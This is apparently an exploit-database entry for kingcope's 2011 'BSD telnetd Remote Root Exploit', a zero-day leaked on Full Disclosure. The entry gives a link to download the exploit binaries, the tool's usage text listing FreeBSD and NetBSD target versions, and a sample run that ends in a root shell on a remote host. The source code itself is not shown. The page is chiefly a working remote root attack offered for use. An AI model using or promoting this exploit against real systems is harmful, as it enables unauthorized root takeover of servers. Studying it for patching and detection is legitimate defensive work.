BSD – ‘TelnetD’ Remote Command Execution (2)

  • Author: kingcope
    Date: 2012-07-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/19520/
  • This exploit was leaked on the Full Disclosure mailing list:
    
    http://seclists.org/fulldisclosure/2012/Jun/404
    
    
    Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19520.zip
    
    
    BSD telnetd Remote Root Exploit *ZERODAY*
    By Kingcope
    Year 2011
    
    usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d]
    [-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s
    src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name
    [port]]
    TARGETS:
    0 FreeBSD 8.2 i386
    1 FreeBSD 8.0/8.1/8.2 i386
    2 FreeBSD 7.3/7.4 i386
    3 FreeBSD 6.2/6.3/6.4 i386
    4 FreeBSD 5.3/5.5 i386
    5 FreeBSD 4.9/4.11 i386
    6 NetBSD 5.0/5.1 i386
    7 NetBSD 4.0 i386
    8 FreeBSD 8.2 amd64
    9 FreeBSD 8.0/8.1 amd64
    10 FreeBSD 7.1/7.3/7.4 amd64
    11 FreeBSD 7.1 amd64
    12 FreeBSD 7.0 amd64
    13 FreeBSD 6.4 amd64
    14 FreeBSD 6.3 amd64
    15 FreeBSD 6.2 amd64
    16 FreeBSD 6.1 amd64
    17 TESTING i386
    18 TESTING amd64
    Trying 192.168.2.8...
    Connected to 192.168.2.8.
    Escape character is '^]'.
    Trying SRA secure login:
    *** EXPLOITING REMOTE TELNETD
    *** by Kingcope
    *** Year 2011
    USING TARGET -- FreeBSD 8.2 amd64
    SC LEN: 30
    ALEX-ALEX
     6:36PM up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09
    USER  TTY   FROM        LOGIN@ IDLE WHAT
    kcope pts/0 192.168.2.3 6:32PM 4    _su (csh)
    FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
    02:41:51 UTC 2011
    root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
    uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)